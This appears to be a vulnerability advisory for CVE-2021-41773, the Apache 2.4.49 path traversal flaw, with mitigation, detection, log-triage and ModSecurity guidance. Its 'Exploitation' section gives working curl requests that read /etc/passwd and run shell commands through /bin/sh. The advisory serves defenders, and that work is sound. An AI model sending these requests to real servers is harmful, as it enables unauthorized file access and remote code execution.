How the CVE Works:
CVE-2021-41773 is a path traversal vulnerability in Apache HTTP Server 2.4.49. The flaw arises due to improper validation of URLs in the `ap_normalize_path()` function. Attackers can exploit this by sending crafted HTTP requests containing directory traversal sequences (`../`). If `mod_cgi` is enabled, this could allow remote code execution (RCE) by escaping the document root and accessing arbitrary files. The vulnerability is exploitable when the server is configured with `Require all granted`, exposing sensitive data or enabling command injection.
DailyCVE Form:
Platform: Apache HTTP Server
Version: 2.4.49
Vulnerability: Path Traversal
Severity: Critical
Date: 2021-10-04
What Undercode Say:
Exploitation:
1. Craft a malicious request:
curl -v "http://target.com/cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd"
2. If `mod_cgi` is active, execute commands:
curl -v "http://target.com/cgi-bin/.%2e/%2e%2e/bin/sh" -d "echo;id"
Mitigation:
1. Update to Apache 2.4.50 or later.
2. Disable `mod_cgi` if unused.
3. Restrict directory permissions:
<Directory "/">
    Require all denied
</Directory>
Detection:
Scan for vulnerable servers using:
nmap -p 80,443 --script http-vuln-cve2021-41773 <target>
Patch Analysis:
Apache’s fix in 2.4.50 adds strict path normalization:
// Patch snippet from server/util.c
if ((path[0] == '/') && (path[1] == '.') && (path[2] == '.') && (path[3] == '/')) {
    return HTTP_BAD_REQUEST;
}
Log Monitoring:
Check for traversal attempts in logs:
grep -i "%2e%2e" /var/log/apache2/access.log
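A literal match on `%2e%2e` misses dot segments that mix a literal dot with an encoded one, and it flags file names that merely contain the string. The following is an added example, not part of the original write-up: a log triage sketch that assumes the Apache combined log format, matches whole `..` path segments in any mix of literal and encoded dots, and separates requests the server answered with 2xx from those it refused. The sample log lines and client addresses are constructed.

```python
import re

# Combined Log Format: host ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# One dot, written literally or percent-encoded (either case).
DOT = r'(?:\.|%2e)'
# A whole ".." path segment: bounded by "/" on the left and "/" or end of path on the right.
TRAVERSAL_RE = re.compile(rf'(?:^|/){DOT}{DOT}(?:/|$)', re.IGNORECASE)

def is_traversal(target):
    """True if the request path (query string excluded) contains a '..' segment."""
    path = target.split('?', 1)[0]
    return bool(TRAVERSAL_RE.search(path))

def triage(lines):
    """Return (client, method, target, status, verdict) for each traversal attempt."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        client, method, target = m.group(1), m.group(2), m.group(3)
        status = int(m.group(4))
        if not is_traversal(target):
            continue
        # A 2xx answer to a traversal request is the case to investigate first.
        verdict = "served" if 200 <= status < 300 else "not_served"
        hits.append((client, method, target, status, verdict))
    return hits

# Constructed sample lines (documentation address ranges, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Oct/2021:10:01:02 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1024 "-" "curl/7.68.0"',
    '203.0.113.7 - - [05/Oct/2021:10:01:05 +0000] "GET /cgi-bin/.%2E/.%2E/etc/passwd HTTP/1.1" 403 199 "-" "curl/7.68.0"',
    '198.51.100.4 - - [05/Oct/2021:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [05/Oct/2021:10:02:09 +0000] "GET /docs/v2.0/notes%2e%2etxt HTTP/1.1" 200 87 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit)
```
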
Workaround:
Use ModSecurity rules:
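# The id value is a placeholder; ModSecurity requires a unique id on every rule.
SecRule REQUEST_URI "@contains %2e%2e" "id:1000001,phase:1,t:lowercase,deny,log,status:403"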
References:
Sources:
Reported By: www.cve.org